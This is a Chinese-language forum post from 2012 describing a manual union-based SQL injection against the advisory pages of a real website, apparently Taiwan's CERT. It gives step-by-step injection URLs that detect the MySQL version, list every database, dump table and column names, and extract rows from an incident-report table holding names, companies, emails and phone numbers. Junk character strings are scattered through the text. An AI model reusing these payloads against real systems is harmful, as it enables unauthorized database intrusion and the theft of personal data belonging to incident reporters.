1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询# {; C' C. ]# b6 _ V. {0 ]0 P, {
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
$ ?2 ?! A" k9 Z2 b( g* p& Khttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
* d" ?- {2 K/ Q. l k& s3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--3 S$ `/ p9 A+ _+ ]1 D
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
; Q) d. d4 I( Q- {4 F0 E. L, s4.判断有没有写权限
: g N" w2 ?3 u5 z$ x) ihttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限+ w$ _& e# J/ C% T
没办法,手动猜表啦2 z4 b7 D. b V0 i z! Y" Z
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
. C* l; ^, Q, {5 {3 Z; K x但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下& \ u1 \! x# P
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--$ N6 f- `5 l5 Z$ K! \9 B1 a
成功查出所有数据库,国外的黑客就是不一般。数据库如下:+ {0 j3 e" N; x1 o1 e: J+ A
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
+ s/ M3 D$ s( O: C6.爆表,爆的是twcert库
; x4 s% q6 D" Y- k5 B7 V% m8 d khttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
! m7 s$ s+ N7 j. ^" y爆出如下表! H$ `! L9 p0 b3 o
downloadfile,irsys,newsdata,secrpt,secrpt_big57 d2 L, E! ]- P
7.爆列名,这次爆的是irsys表
. j7 j( L% u5 _5 W; G, K5 V: Jhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--; V- W. O6 ^" M- r& ~
爆出如下列 G1 a0 o6 r4 p+ s/ I; z. J6 k
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status. O& {/ m6 X4 _
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
$ n2 o* f7 Y' m: L% c- {5 Uhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
( q d. O: {" G返回是3,说明每个列里有3个地段( A8 K* Q7 ~ j9 H7 i
9.爆字段内容2 Z5 x u/ s3 M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--5 V! F2 @2 t3 m# T
爆出name列的第一个字段的内容9 R( m8 @; I, [- [- R1 V( |( G) F
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- r5 h2 t6 e% q$ f: n" g
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对